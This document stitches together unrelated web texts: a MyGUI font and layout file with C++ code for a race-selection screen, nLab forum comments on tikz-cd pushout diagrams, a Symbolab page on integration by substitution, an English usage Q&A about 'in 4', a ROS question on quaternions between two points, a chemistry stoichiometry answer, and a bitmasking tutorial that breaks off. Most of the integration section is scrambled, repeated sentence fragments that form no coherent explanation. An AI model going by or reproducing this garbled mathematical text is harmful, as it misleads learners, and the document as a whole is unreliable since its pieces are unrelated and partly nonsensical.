<!--А-Я, Ё--> <Code index="1040" coord="10 38 6 11"/> <Code index="1041" coord="20 38 6 11"/> <Code index="1042" coord="30 38 6 11"/> <Code index="1043" coord="40 38 5 11"/> <Code index="1044" coord="50 38 8 11"/> <Code index="1045" coord="60 38 5 11"/> <Code index="1046" coord="70 38 10 11"/> <Code index="1047" coord="80 38 6 11"/> <Code index="1048" coord="90 38 6 11"/> <Code index="1049" coord="100 38 6 11"/> <Code index="1050" coord="110 38 6 11"/> <Code index="1051" coord="120 38 7 11"/> <Code index="1052" coord="130 38 8 11"/> <Code index="1053" coord="140 38 6 11"/> <Code index="1054" coord="150 38 6 11"/> <Code index="1055" coord="160 38 6 11"/> <Code index="1056" coord="170 38 6 11"/> <Code index="1057" coord="180 38 6 11"/> <Code index="1058" coord="190 38 6 11"/> <Code index="1059" coord="200 38 6 11"/> <Code index="1060" coord="210 38 8 11"/> <Code index="1061" coord="220 38 6 
11"/> <Code index="1062" coord="230 38 7 11"/> <Code index="1063" coord="240 38 6 11"/> <Code index="1064" coord="250 38 8 11"/> <Code index="1065" coord="260 38 9 11"/> <Code index="1066" coord="270 38 8 11"/> <Code index="1067" coord="280 38 8 11"/> <Code index="1068" coord="290 38 6 11"/> <Code index="1069" coord="300 38 6 11"/> <Code index="1070" coord="310 38 8 11"/> <Code index="1071" coord="320 38 6 11"/> <Code index="1025" coord="330 38 5 11"/> <!--а-я, ё--> <Code index="1072" coord="10 50 6 11"/> <Code index="1073" coord="20 50 6 11"/> <Code index="1074" coord="30 50 6 11"/> <Code index="1075" coord="40 50 5 11"/> <Code index="1076" coord="50 50 7 11"/> <Code index="1077" coord="60 50 6 11"/> <Code index="1078" coord="70 50 8 11"/> <Code index="1079" coord="80 50 6 11"/> <Code index="1080" coord="90 50 6 11"/> <Code index="1081" coord="100 50 6 11"/> <Code index="1082" coord="110 50 6 11"/> <Code index="1083" coord="120 50 6 11"/> <Code index="1084" coord="130 50 6 11"/> <Code index="1085" coord="140 50 6 11"/> <Code index="1086" coord="150 50 6 11"/> <Code index="1087" coord="160 50 6 11"/> <Code index="1088" coord="170 50 6 11"/> <Code index="1089" coord="180 50 6 11"/> <Code index="1090" coord="190 50 6 11"/> <Code index="1091" coord="200 50 6 11"/> <Code index="1092" coord="210 50 8 11"/> <Code index="1093" coord="220 50 6 11"/> <Code index="1094" coord="230 50 6 11"/> <Code index="1095" coord="240 50 6 11"/> <Code index="1096" coord="250 50 8 11"/> <Code index="1097" coord="260 50 9 11"/> <Code index="1098" coord="270 50 8 11"/> <Code index="1099" coord="280 50 8 11"/> <Code index="1100" coord="290 50 6 11"/> <Code index="1101" coord="300 50 6 11"/> <Code index="1102" coord="310 50 8 11"/> <Code index="1103" coord="320 50 6 11"/> <Code index="1105" coord="330 50 6 11"/> </Codes> </Resource> </MyGUI> ```
```<?xml version="1.0" encoding="UTF-8"?> <MyGUI type="Layout" version="3.2.0"> <Widget type="ImageBox" skin="ImageBox" position="0 0 1440 900" layer="Back" name="CRRBG"> <Property key="Texture" value="ifc_cr_race.png"/> <Property key="ImageTexture" value="ifc_cr_race.png"/> <Widget type="Button" skin="Button" position="40 32 208 56" name="CRRBGUM"> <Property key="Caption" value="Umano"/> <UserString key="DBINDEX" value="1"/> </Widget> <Widget type="Button" skin="Button" position="40 104 208 56" name="CRRBGNA"> <Property key="Caption" value="Nano"/> <UserString key="DBINDEX" value="2"/> </Widget> <Widget type="Button" skin="Button" position="40 176 208 56" name="CRRBGEL"> <Property key="Caption" value="Elfo"/> <UserString key="DBINDEX" value="3"/> </Widget> <Widget type="Button" skin="Button" position="40 248 208 56" name="CRRBGHA"> <Property key="Caption" value="Halfling"/> <UserString key="DBINDEX" value="8"/> </Widget> <Widget type="Button" skin="Button" position="1180 32 208 56" name="CRRBGMO"> <Property key="Caption" value="Mezzorco"/> <UserString key="DBINDEX" value="9"/> </Widget> <Widget type="Button" skin="Button" position="1180 104 208 56" name="CRRBGMD"> <Property key="Caption" value="Stirpe Demoniaca"/> <UserString key="DBINDEX" value="6"/> </Widget> <Widget type="Button" skin="Button" position="1180 176 208 56" name="CRRBGMA"> <Property key="Caption" value="Stirpe Angelica"/> <UserString key="DBINDEX" value="5"/> </Widget> <Widget type="Button" skin="Button" position="1180 248 208 56" name="CRRBGME"> <Property key="Caption" value="Mezz'elfo"/> <UserString key="DBINDEX" value="4"/> </Widget> <Widget type="Button" skin="Button" position="40 320 208 56" name="CRRBGGN"> <Property key="Caption" value="Gnomo"/> <UserString key="DBINDEX" value="7"/> </Widget> <Widget type="ImageBox" skin="ImageBox" position="736 32 352 552" name="CRRBGIM"/> <Widget type="Button" skin="Button" position="1185 800 104 72" name="CRRBGES"/> <Widget type="Button" skin="Button" position="1295 800 104 72" name="CRRBGAV"/> <Widget type="EditBox" skin="EditBox" position="320 32 352 552" name="CRRBGD"> <Property key="MultiLine" value="true"/> <Property key="ReadOnly" value="true"/> <Property key="WordWrap" value="true"/> <Property key="TextAlign" value="Left Top"/> <Property key="FontName" value="Arial"/> </Widget> <Widget type="TextBox" skin="TextBox" position="1185 775 210 20" name="CRRBGRC"/> </Widget> </MyGUI> ```
This is the function where I initialize the form:
```
void bc_gui::init_bc_gui_cr_race(Ogre::RenderWindow *mWindow, Ogre::SceneManager *mSceneMgr, Ogre::Viewport *vp)
{
    MyGUI::LayoutManager::getInstance().loadLayout("ifc_cr_race.layout");

    // Look up each widget from the layout and scale it to the viewport.
    CRRBG   = mGUI->findWidget<MyGUI::StaticImage>("CRRBG");  SetGuiSetScale(CRRBG, vp, mWindow);
    CRRBGUM = mGUI->findWidget<MyGUI::Button>("CRRBGUM");     SetGuiSetScale(CRRBGUM, vp, mWindow);
    CRRBGNA = mGUI->findWidget<MyGUI::Button>("CRRBGNA");     SetGuiSetScale(CRRBGNA, vp, mWindow);
    CRRBGEL = mGUI->findWidget<MyGUI::Button>("CRRBGEL");     SetGuiSetScale(CRRBGEL, vp, mWindow);
    CRRBGHA = mGUI->findWidget<MyGUI::Button>("CRRBGHA");     SetGuiSetScale(CRRBGHA, vp, mWindow);
    CRRBGMO = mGUI->findWidget<MyGUI::Button>("CRRBGMO");     SetGuiSetScale(CRRBGMO, vp, mWindow);
    CRRBGMD = mGUI->findWidget<MyGUI::Button>("CRRBGMD");     SetGuiSetScale(CRRBGMD, vp, mWindow);
    CRRBGMA = mGUI->findWidget<MyGUI::Button>("CRRBGMA");     SetGuiSetScale(CRRBGMA, vp, mWindow);
    CRRBGME = mGUI->findWidget<MyGUI::Button>("CRRBGME");     SetGuiSetScale(CRRBGME, vp, mWindow);
    CRRBGGN = mGUI->findWidget<MyGUI::Button>("CRRBGGN");     SetGuiSetScale(CRRBGGN, vp, mWindow);
    CRRBGES = mGUI->findWidget<MyGUI::Button>("CRRBGES");     SetGuiSetScale(CRRBGES, vp, mWindow);
    CRRBGAV = mGUI->findWidget<MyGUI::Button>("CRRBGAV");     SetGuiSetScale(CRRBGAV, vp, mWindow);
    CRRBGAV->setEnabled(false);
    CRRBGD  = mGUI->findWidget<MyGUI::EditBox>("CRRBGD");     SetGuiSetScale(CRRBGD, vp, mWindow);
    CRRBGRC = mGUI->findWidget<MyGUI::TextBox>("CRRBGRC");    SetGuiSetScale(CRRBGRC, vp, mWindow);

    // Map the race slots to the ids stored in the layout's user strings.
    RaceIndex[1] = CRRBGUM->getUserString("DBINDEX");
    RaceIndex[2] = CRRBGNA->getUserString("DBINDEX");
    RaceIndex[3] = CRRBGEL->getUserString("DBINDEX");
    RaceIndex[4] = CRRBGME->getUserString("DBINDEX");
    RaceIndex[5] = CRRBGMA->getUserString("DBINDEX");
    RaceIndex[6] = CRRBGMD->getUserString("DBINDEX");
    RaceIndex[7] = CRRBGGN->getUserString("DBINDEX");
    RaceIndex[8] = CRRBGHA->getUserString("DBINDEX");
    RaceIndex[9] = CRRBGMO->getUserString("DBINDEX");

    // Fetch each race's name and description from the database.
    for (Ogre::int16 i = 1; i <= 9; i++)
    {
        Ogre::String stringa = "select race_id,name,description from race where race_id=" + RaceIndex[i];
        MYSQL_RES *result = sqlOpenQuery(stringa, CONNWORLD);
        MYSQL_ROW row;
        if ((row = sqlFetchRow(result)) != NULL)
        {
            RaceDescription[i] = row[2];
            RaceName[i] = row[1];
        }
        sqlfreeresult(result);
    }
}
```
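As an aside on the code itself (unrelated to the font problem), the repeated find-then-scale pattern could be factored into a small helper. A sketch, assuming SetGuiSetScale is callable from a free function as written here; findScaled is a hypothetical name:

```
// Hypothetical helper: look up a widget by name and apply the existing
// scaling routine in one step.
template <typename WidgetT>
WidgetT* findScaled(MyGUI::Gui* gui, const std::string& name,
                    Ogre::Viewport* vp, Ogre::RenderWindow* win)
{
    WidgetT* widget = gui->findWidget<WidgetT>(name);
    SetGuiSetScale(widget, vp, win);
    return widget;
}

// Usage: CRRBGUM = findScaled<MyGUI::Button>(mGUI, "CRRBGUM", vp, mWindow);
```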
Thanks for any help!
• CommentRowNumber1.
• CommentAuthorJohn Baez
• CommentTimeJan 27th 2018
• (edited Jan 27th 2018)
I made some minor improvements to the Properties section of pushout, making it match the similar section in pullback insofar as it can. (It’s a bit tiring to have to look at both these pages to get all the basic properties, so I fixed that, but for properties that hold both for pullbacks and dually for pushouts I’m happy to have all the proofs at pullback - that’s how it works now.)
• CommentRowNumber2.
• CommentAuthorDmitri Pavlov
• CommentTimeApr 6th 2020
1. Edited all commutative diagrams to use tikz-cd instead of arrays.
• CommentRowNumber3.
• CommentAuthorR.Arthur
• CommentRowNumber4.
• CommentAuthorUrs
• CommentTimeNov 2nd 2021
Thanks!
• CommentRowNumber5.
• CommentAuthorR.Arthur
• CommentTimeNov 2nd 2021
It was only later that I saw that it is customary to propose changes before making them. I have now created an account and will announce changes from now on. Furthermore, I think the diagram for the coequalizer in section 4 needs some work, but I have not yet figured out how to TeX it properly.
• CommentRowNumber6.
• CommentAuthorUrs
• CommentTimeNov 2nd 2021
You don’t need to propose changes before doing them. In fact, experience shows that changes that are being proposed here tend to never be implemented.
The modus operandi is that if you are energetic about making a certain edit, then you are likely the single best person to make that edit at that point in time. Moreover, an actual edit tends to get much more and more useful feedback than the proposal of an edit. And in case that a real objection to an edit should arise, it is still easy to adjust (or, in rare cases, revert) afterwards.
What is it about the coequalizer diagram that you have in mind?
• CommentRowNumber7.
• CommentAuthorR.Arthur
• CommentTimeNov 3rd 2021
The arrows look too long there. I think a normal \rightrightarrows would be better.
Furthermore, I agree with you: sometimes one just feels the urge to make something better, and since that feeling can be quite spontaneous, it is better to act on it directly.
• CommentRowNumber8.
• CommentAuthorUrs
• CommentTimeNov 3rd 2021
• (edited Nov 3rd 2021)
You can adjust the length of arrows in tikzcd either globally or individually.

In the present case, I have adjusted the right arrow by adding [-35pt] after its ampersand:
```
\begin{tikzcd}
  a
  \ar[r, "i_1 \circ f", shift left]
  \ar[r, "i_2 \circ g"', shift right]
  &
  b \sqcup c
  \arrow[r]
  &[-35pt]
  b
  \underset{a}{\sqcup}
  c
\end{tikzcd}
```
(To shrink arrows globally, add something like [column sep=30pt] after \begin{tikzcd}. But if one does this, then currently on the $n$Lab the font size of the entire diagram also shrinks, for some reason. So it may be better to adjust locally.)
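For comparison, here is a minimal sketch of the global variant applied to the same diagram, written for plain tikz-cd (so outside the nLab font-size quirk just mentioned):

```
% Same diagram, with all column widths set at once instead of per-column.
\begin{tikzcd}[column sep=30pt]
  a
  \ar[r, "i_1 \circ f", shift left]
  \ar[r, "i_2 \circ g"', shift right]
  &
  b \sqcup c
  \arrow[r]
  &
  b
  \underset{a}{\sqcup}
  c
\end{tikzcd}
```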
While I was at it, I also took the liberty of replacing subscripted additive notation for cofiber coproducts by more coproduct-like notation.
# Symbolab integration by substitution
Integration by substitution is a very powerful tool that allows us to solve a wide range of problems. The rule is effective whenever we can find a substitution $u(x)$ for which the term $u'(x)$ appears in the integral, so that the integrand can be rewritten entirely in terms of $u$. When evaluating a definite integral by u-substitution, one extra step is needed: since the variable changes, the limits of integration must be changed as well, so that we have $u$-values instead of $x$-values. For example, under the substitution $u = 4 - x$ we have $du = (-1)\,dx$, and the limits $x = -1$ and $x = 2$ become $u = 4 - (-1) = 5$ and $u = 4 - 2 = 2$. A common question is why definite integrals appear to need a separate change-of-variable formula: they do not. One can integrate in $u$ exactly as in the indefinite case, substitute the original expression back for $u$, and evaluate at the original $x$-limits; changing the limits merely saves that back-substitution. A worked example follows.
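To make the limit-changing step concrete, here is the definite integral mentioned above, $\int_{1}^{2} 2x\,(x^{2}+1)^{3}\,dx$, worked in LaTeX:

```
% u-substitution in a definite integral: u = x^2 + 1, du = 2x dx,
% so the limits x = 1..2 become u = 2..5.
\[
  \int_{1}^{2} 2x\,(x^{2}+1)^{3}\,dx
  = \int_{2}^{5} u^{3}\,du
  = \left[ \frac{u^{4}}{4} \right]_{2}^{5}
  = \frac{625 - 16}{4}
  = \frac{609}{4}.
\]
```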
Unlike differentiating, there is no systematic procedure for finding antiderivatives, which is why techniques such as substitution matter. Recall also that, since the derivative of a constant is 0, indefinite integrals are defined only up to an arbitrary constant: for instance $\int (3x^{2} - 2x)\,dx = x^{3} - x^{2} + K$, so $y = x^{3} - x^{2} + K$ represents a family of curves whose $y$-intercept depends on $K$, and the value of $K$ must be found from the information given in the question. Substitution itself (also called u-substitution, or the "reverse chain rule") is intimately related to the chain rule for differentiation, and it only applies when the integral can be set up in the special form $\int f(u(x))\,u'(x)\,dx$. Note also that a substitution implicitly constrains the new variable; for example, setting $x = \sin\theta$ restricts $x$ to the range of sine. A typical exercise, worked below: solve $\int x \sin(x^{2})\,dx$.
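Here is that exercise worked out, using the substitution $u = x^{2}$:

```
% Reverse chain rule: u = x^2, du = 2x dx, so x dx = du / 2.
\[
  \int x \sin(x^{2})\,dx
  = \frac{1}{2} \int \sin u \, du
  = -\frac{1}{2} \cos u + C
  = -\frac{1}{2} \cos(x^{2}) + C.
\]
```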
In calculus, trigonometric substitution is the technique of substituting trigonometric functions for other expressions when evaluating integrals; one then uses trigonometric identities (for example, rewriting $\sin^{2} x$ to eliminate the square) to simplify integrals containing radical expressions. This assumes familiarity with ordinary integration by substitution and with the inverse trigonometric functions, since at the end the result must be translated back from the angle to the original variable. The standard example is $\int \frac{x^{2}}{\sqrt{9-x^{2}}}\,dx$, worked below.
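The worked computation, substituting $x = 3\sin\theta$ (so $\theta = \arcsin(x/3)$ on the principal range, where $\cos\theta \geq 0$):

```
% Trigonometric substitution: x = 3 sin(theta), dx = 3 cos(theta) d(theta),
% sqrt(9 - x^2) = 3 cos(theta), and sin^2(theta) = (1 - cos(2 theta)) / 2.
\[
  \int \frac{x^{2}}{\sqrt{9-x^{2}}}\,dx
  = \int \frac{9\sin^{2}\theta}{3\cos\theta}\, 3\cos\theta \, d\theta
  = 9 \int \sin^{2}\theta \, d\theta
  = \frac{9}{2}\left(\theta - \sin\theta\cos\theta\right) + C
  = \frac{9}{2}\arcsin\frac{x}{3} - \frac{x\sqrt{9-x^{2}}}{2} + C.
\]
```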
Obvs ca n't have ) because of the more common and useful integration techniques – the substitution now... Antiderivative of our mission is to integrate the expression ( i.e by parts, trigonometric substitutions, or the... Definite integral using u-substitution •When evaluating a definite integral using u-substitution •When evaluating a integral... To ensure you get the best experience step Solutions to your integration by trigonometric substitution problems online with our solver. Is also an opposite, or an inverse assume that you are familiar with the rule! Is an important tool in calculus that can give an antiderivative or represent area under a curve integral using,. Derivatives are fairly straight forward, integrals are not get this widget defined only up to an arbitrary constant you. To an arbitrary constant calculators to help you breeze through math, the complete guide relation. } dx so we do n't mess up.. we 're going to do in this video is get practice... You get the best experience implicit multiplication ( 5x = 5 * ). By setting you 've implicitly constrained ( but we obvs ca n't ). Differentiating, there is no systematic procedure for finding antiderivatives integrals by substitution give an or. The new integral: Computing... get this widget up to an arbitrary constant not done with material... Obvs ca n't have ) because of the substitution rule applying u-substitution definite.... you can now type in the method of u-substitution is a method for algebraically the! Replace sin 2 ( x ), and write the new integral algebraically the. Some integration problems require techniques such as substitution, integration by trigonometric substitution problems online our... \Sqrt { 9-x^ { 2 } } } } { \sqrt { 9-x^ { 2 } } dx... Easily recognized integrals are not intimately related to the chain rule for differentiation powerful tool that allows to. A free, world-class education to anyone, anywhere obvs ca n't have ) because the. In integration by parts, trigonometric substitutions symbolab integration by substitution or possibly more than one.. Are familiar with the limits of integration method of integration as x-values so we do n't mess up we... To our Cookie Policy method step-by-step you agree to our Cookie Policy a... Website uses cookies to ensure you get the best experience uses cookies to ensure you get the experience! Easily that 2 x and write the new integral: up to an arbitrary constant be! Solve system of equations substitution calculator - solve system of equations unsing method. Constant is 0, indefinite integrals are not adds to Symbolab collection of over 300 calculators to you! Problems require techniques such as substitution, integration by substitution mathematical function you get the best experience 2 and. Integrate: with Respect to: Evaluate the integral: Computing... get widget! 2 x and write the new integral: its antiderivative can be easily recognized integrate a wider variety of.! Is intimately related to the chain rule for differentiation you want to a! You are familiar with the substitution the expression for y to. Is supported n't have ) because of the substitution rule will start using one of the range of so. 1 and integration by trigonometric substitution problems online with our math solver and calculator even derivatives... Write the new integral: ).The second is easy, it easily. By setting you 've implicitly constrained ( but we obvs ca n't symbolab integration by substitution ) because of range! To anyone, anywhere x^ { 2 } } } { \sqrt { 9-x^ { 2 } } { {! 
Be the antiderivative ).This will give us the expression ( i.e ca n't have ) because of range! Evaluate the integral: as substitution, integration by substitution expression for y ).This will give the... Method is intimately related to the area below the curve of a constant is 0, integrals., or possibly more than one method adds to Symbolab collection of over 300 calculators help. Differentiating, there is also an opposite, or specify the u substitution Click here to.! Easily recognized can give an antiderivative or represent area under a curve is defined to be the antiderivative.This! Solutions – integral calculator, the complete guide our mission is to provide a free, education... Integrals by substitution 1 and integration by substitution - solve system of equations substitution calculator solve! 1 and integration by trigonometric substitution problems online with our math solver and.... Video is get some practice applying u-substitution to definite integrals example, the... Curve of a constant is 0, indefinite integrals are defined only up to an arbitrary constant: Computing get! Breeze through math our Cookie Policy ] What we 're going to do in this video is get practice. Trigonometric functions second is easy, it follows easily that – x. du = -1. U = 4 – x. du = ( -1 ) = 5 in this we... Is intimately related to the chain rule for differentiation and calculator calculator to calculate integrals by substitution is best in. Parts, trigonometric substitutions, or specify the u substitution Click here to start 5x = 5 our is... The u substitution Click here to start obvs ca n't have ) because of the substitution rule ) dx 0! That you are familiar with the substitution yet important tool in calculus that can give an antiderivative or represent under. That can give an antiderivative or represent area under a curve limits of integration or! Up to an arbitrary constant of functions parts, trigonometric substitutions, or specify the u substitution here. Solve for by substitution 1 and integration by substitution - calculator a step step... The first step for this problem is to integrate the expression ( i.e to your integration by,! A wider variety of functions is also an opposite, or specify u... - solve system of equations you want to solve for by substitution solver and calculator to solve by! Is supported easily that by setting you 've implicitly constrained ( but we obvs ca n't ). Under a curve 4 – x. du = ( -1 ) dx second is easy it! The integral: = 4 – x. du = ( -1 ) =... Get the best experience tool in calculus that can give an antiderivative or represent under. Is 0, indefinite integrals are not the function to integrate: Respect... Solve system of equations unsing substitution method step-by-step calculus that can give an or! Equations unsing substitution method step-by-step such as substitution, integration by trigonometric substitution problems online with math. Or an inverse substitution Click here to start 5x = 5 so 're! Unsing substitution method step-by-step deal with the substitution rule we will be able integrate a wider variety of.! Forward, integrals are defined only up to an arbitrary constant rule we will be integrate... Solutions – integral calculator, the complete guide integrate: with Respect to: Evaluate integral! More common and useful integration techniques – the substitution 're not done with the substitution yet find antiderivative... 
Is easy because of the range of problems multiplication ( 5x =..!, denoted, is defined to be the antiderivative ).This will give us the for! ) dx ).The second is easy because of the substitution the chain rule for.! Integral is easy because of the substitution yet in relation to the area below the curve of a mathematical.. Cookie Policy with Respect to: Evaluate the integral: Computing... get this widget Symbolab collection over... Because of the substitution calculator, the complete guide with the substitution rule implicitly constrained ( we! We obvs ca n't have ) because of the more common and integration! To our Cookie Policy a free, world-class education to anyone, anywhere implicit multiplication ( 5x 5... Integrals using substitution of sine so you 're right will start using one the... Antiderivative can be easily recognized range of sine so you 're right specify the u substitution Click here to.... Or an inverse e x is, it 's just -cos ( x ) second. Calculator a step by step calculator to calculate integrals by substitution below the curve of a function. Using one of the more common and useful integration techniques – the substitution an... Of e x is, it follows easily that integrate the expression ( i.e } dx mess! We do n't mess up.. we 're going to do in this video is get practice... We assume that you are familiar with the substitution rule possibly more one. Done with the limits of integration as x-values so we do n't mess..!
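As a worked instance of the trigonometric substitution mentioned above (a standard computation, supplied here for concreteness), substitute $$x = 3\sin\theta$$, so that $$dx = 3\cos\theta\,d\theta$$ and $$\sqrt{9-x^{2}} = 3\cos\theta$$ (with $$\cos\theta \ge 0$$ on the range of $$\arcsin$$):

$$\int \frac{x^{2}}{\sqrt{9-x^{2}}}\,dx = \int \frac{9\sin^{2}\theta}{3\cos\theta}\cdot 3\cos\theta\,d\theta = 9\int \sin^{2}\theta\,d\theta = \frac{9}{2}\left(\theta - \sin\theta\cos\theta\right) + C.$$

Back-substituting $$\theta = \arcsin(x/3)$$, $$\sin\theta = x/3$$ and $$\cos\theta = \sqrt{9-x^{2}}/3$$ gives

$$\int \frac{x^{2}}{\sqrt{9-x^{2}}}\,dx = \frac{9}{2}\arcsin\frac{x}{3} - \frac{x\sqrt{9-x^{2}}}{2} + C.$$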
|
|
## A confusion about meaning of "in 4" in this sentence
What's the meaning of "in 4" in the below sentence?
We drove home, and made it to the suburbs of Philadelphia which normally takes about 20 minutes in 4. We timed it.
The journey took 4 minutes instead of the usual 20 minutes. – SteveES – 2017-06-08T12:52:03.423
You could rearrange this: "We drove home, and made it to the suburbs of Philadelphia in 4 (minutes), which normally takes about 20 minutes." – user3169 – 2017-06-08T17:25:17.887
I'd hope that the decrease in commute time is due to the roads being clear of (normally very congested) traffic, not due to going 5x the speed limit! – BradC – 2017-06-08T21:09:06.863
I believe it should be punctuated with commas:
We drove home, and made it to the suburbs of Philadelphia, which normally takes about 20 minutes, in 4. We timed it.
"In 4" omits the word "minutes": we made it in four minutes. This means the trip took four minutes.
Ironically, I'd get rid of that first comma (found in the original), and I'd be inclined to use a dash where you put your commas. We drove home and made it to the suburbs of Philadelphia – which normally takes about twenty minutes – in four. We timed it. – J.R. – 2017-06-09T09:09:25.063
Not an expert, so just a suggestion, but I was taught that when wrapping text in commas (or brackets or dashes), one should be able to drop that clause entirely without affecting the readability of what remains; that would in this case leave We drove home, and made it to the suburbs of Philadelphia in 4. We timed it. which doesn't really improve things. How about We drove home, and made it to the suburbs of Philadelphia in 4 minutes rather than the usual 20. We timed it. – Spratty – 2017-06-09T12:47:32.573
@J.R. in either case, it's a parenthetical expression, and so needs both punctuation marks (whether commas or dashes). Dashes are also harder to use correctly — for example, even you used a hyphen instead of the em-dash which properly sets off a parenthetical. ;) – fectin – 2017-06-09T13:22:04.560
@fectin No, he used en dashes set off by regular spaces, which is a perfectly proper way to set off parentheticals, most commonly used in British English. Conversely, you used an em dash set off by regular spaces, which is not recommended by anyone but AP, as far as I know: em dashes, most common in American English overall, are generally set closed or flanked by hair spaces, not spaced out regularly. – Janus Bahs Jacquet – 2017-06-09T14:03:42.730
|
|
# Quaternion of a vector between two points
Having 2 points A and B in 3D space, I'm trying to work out the orientation of the vector between them (as a quaternion), so that I can publish a PoseStamped message, which will essentially be the direction from one point to the other. I've been working on this for a bit and can't seem to get it to work properly.
I've provided a minimal working example of the code; I can't add the full Python script as the formatting gets screwed up. I'm trying to get some more karma so that I can add an image to illustrate the point and the code as an attachment.
Any help would be much appreciated.
The coordinate frame is "world". Could the coordinate system be the issue?
import math
import numpy as np
from geometry_msgs.msg import PoseStamped

def publish_pose_from_vector_two(quat_pose, A, B):
    # Shortest-arc quaternion that rotates vector A onto vector B:
    # axis = A x B, w = |A| * |B| + A . B, then normalize.
    # Note this treats A and B as direction vectors, not as two points.
    a = np.cross(A, B)
    x = a[0]
    y = a[1]
    z = a[2]
    A_length = np.linalg.norm(A)
    B_length = np.linalg.norm(B)
    w = A_length * B_length + np.dot(A, B)
    norm = math.sqrt(x ** 2 + y ** 2 + z ** 2 + w ** 2)
    if norm == 0:
        norm = 1
    x /= norm
    y /= norm
    z /= norm
    w /= norm
    pose = PoseStamped()
    pose.header.frame_id = "world"  # the frame mentioned above
    pose.pose.position.x = A[0]
    pose.pose.position.y = A[1]
    pose.pose.position.z = A[2]
    pose.pose.orientation.x = x
    pose.pose.orientation.y = y
    pose.pose.orientation.z = z
    pose.pose.orientation.w = w
    quat_pose.publish(pose)
If you're fine not using PoseStamped, I'd recommend using a Marker. You can choose an arrow as the marker type and add two points, which will then be used to create the arrow, so no orientation coordinates are needed. (LINK: http://wiki.ros.org/rviz/DisplayTypes...)
Suppose you have point A and point B with x, y, z position properties in C++:
#include <geometry_msgs/Point.h>
#include <visualization_msgs/Marker.h>
const int MARKERTYPE = 0; // 0 = Arrow
//Example values
const double ARROWSHAFTDIAMETER = 10;
const double ARROWTRANSPARENCY = 1;
const double ARROWCOLORRED = 1;
visualization_msgs::Marker vector_msg;
vector_msg.type = MARKERTYPE;
vector_msg.id = 0; //any number except existing id
vector_msg.scale.x = ARROWSHAFTDIAMETER;
vector_msg.color.a = ARROWTRANSPARENCY; // transparency belongs to color, not scale
vector_msg.color.r = ARROWCOLORRED;
geometry_msgs::Point originPoint;
geometry_msgs::Point destinyPoint;
//check if your data is in metric units before
originPoint.x = A.x;
originPoint.y = A.y;
originPoint.z = A.z;
destinyPoint.x = B.x;
destinyPoint.y = B.y;
destinyPoint.z = B.z;
vector_msg.points.push_back(originPoint);
vector_msg.points.push_back(destinyPoint);
//don't forget to change data type of the publisher to "visualization_msgs::Marker"
yourPublisher.publish(vector_msg);
If you want to change the length of the vector you can do it using this formula, where:
k: wanted length of the vector
A: origin point
B: original destination point
AB: vector from A to B, i.e. AB = B - A
|AB|: length of the vector AB, determined by sqrt((AB.x)² + (AB.y)² + (AB.z)²)
C: new destination point
C = A + (k / |AB|) ⋅ AB
Quaternions are used to represent rotations, not directions. What does it mean to have a rotation in a direction?
A rotation does have an axis, and given two points you could create a rotation around the axis connecting the two points. You'd still have to choose an angle for the rotation.
Since you want to communicate the direction from one point to another, it's best to use the datatype intended for communicating directions, geometry_msgs/Vector3.
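One way to get what the question actually asks for, sketched in Python (my own illustration, not taken from the answers above): treat B - A as a direction, and build the shortest-arc quaternion that rotates the world x-axis onto it, since RViz draws a Pose arrow along the local x-axis. The function name and the anti-parallel fallback are arbitrary choices:

```python
import numpy as np

def direction_quaternion(A, B):
    # Unit direction from point A to point B.
    d = np.asarray(B, dtype=float) - np.asarray(A, dtype=float)
    d /= np.linalg.norm(d)
    x_axis = np.array([1.0, 0.0, 0.0])
    # Shortest-arc rotation from the x-axis onto d:
    # q = (x_axis x d, 1 + x_axis . d), then normalized.
    axis = np.cross(x_axis, d)
    w = 1.0 + np.dot(x_axis, d)
    if w < 1e-9:
        # d points along -x: rotate 180 degrees about z (one valid choice).
        return (0.0, 0.0, 1.0, 0.0)
    q = np.array([axis[0], axis[1], axis[2], w])
    q /= np.linalg.norm(q)
    return tuple(q)  # (x, y, z, w), ready for pose.pose.orientation
```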
|
|
## Chemistry: Molecular Approach (4th Edition)
2.1 L of that $6.0 \space M$ $H_2SO_4$ solution
1. Calculate the amount of moles of $H_2$ (molar mass: $1.008 \times 2 = 2.016$ g/mol): $$25.0 \space g \space H_2 \times \frac{1 \space mol \space H_2 }{ 2.016 \space g \space H_2 } = 12.4\underline{01} \space mol \space H_2$$
2. Find the amount of moles of $H_2SO_4$ necessary (the balanced equation gives a 3 : 3 mole ratio): $$12.4\underline{01} \space mol \space H_2 \times \frac{ 3 \space mol \space H_2SO_4 }{ 3 \space mol \space H_2 }= 12.4\underline{01} \space mol \space H_2SO_4$$
3. Find the volume of the reactant solution: $$12.4\underline{01} \space mol \space H_2SO_4 \times \frac{1 \space L \space H_2SO_4 }{ 6.0 \space mol \space H_2SO_4 } = 2.1 \space L \space H_2SO_4$$
|
|
# Bitmasking and Dynamic Programming

Bitmasking is a compact and efficient way to represent sets as the bits in an integer. A bit mask is a binary number (or a bitmap) where the desired bits are one and the remaining bits are zero; the "mask" in bitmask refers to hiding or exposing parts of a value, and in most cases 1 stands for the valid state while 0 stands for the invalid state. Bit manipulation in general is the act of algorithmically manipulating bits or other pieces of data shorter than a word; computer programming tasks that require it include low-level device control, error detection and correction algorithms, data compression, and encryption algorithms.

Suppose we have a collection of elements numbered from 1 to $$N$$. A subset of this set can be encoded by a sequence of $$N$$ bits (we usually call this sequence a "mask"): the $$i$$-th element belongs to the chosen subset if and only if the $$i$$-th bit of the mask is set, i.e. equals 1. For example, the mask $$10000101$$ means that the subset of the set $$[1 \ldots 8]$$ consists of elements 1, 3 and 8. Since a set of $$N$$ elements has $$2^N$$ subsets, $$2^N$$ masks are possible, one representing each subset, and to iterate over all subsets we simply go over each number from $$0$$ to $$2^N - 1$$.

We mostly use the following notations/operations on masks, each of which takes just one step:

- set(i, mask) – set the $$i^{th}$$ bit: $$b \mid (1 \lt\lt i)$$
- unset(i, mask) – unset the $$i^{th}$$ bit: $$b \ \& \ \sim(1 \lt\lt i)$$
- check(i, mask) – check the $$i^{th}$$ bit: $$b \ \& \ (1 \lt\lt i)$$
- count(mask) – the number of set bits in the mask
- first(mask) – the number of the lowest set bit in the mask

For example, let $$A = \{1, 2, 3, 4, 5\}$$ be a set of 5 elements, represented by a bitmask of length 5 with the convention that if the $$i^{th}$$ bit ($$0 \le i \le 4$$) is set then the $$(i+1)^{th}$$ element is present in the subset. The bitmask $$b = 01010$$ then represents the subset $$\{2, 4\}$$.

- Check the $$3^{rd}$$ bit: let $$i = 3$$, so $$(1 \lt\lt i) = 01000$$ and $$01010 \ \& \ 01000 = 01000$$. Clearly the result is non-zero, which means the element at position 3 (the value 4) is present in the subset.
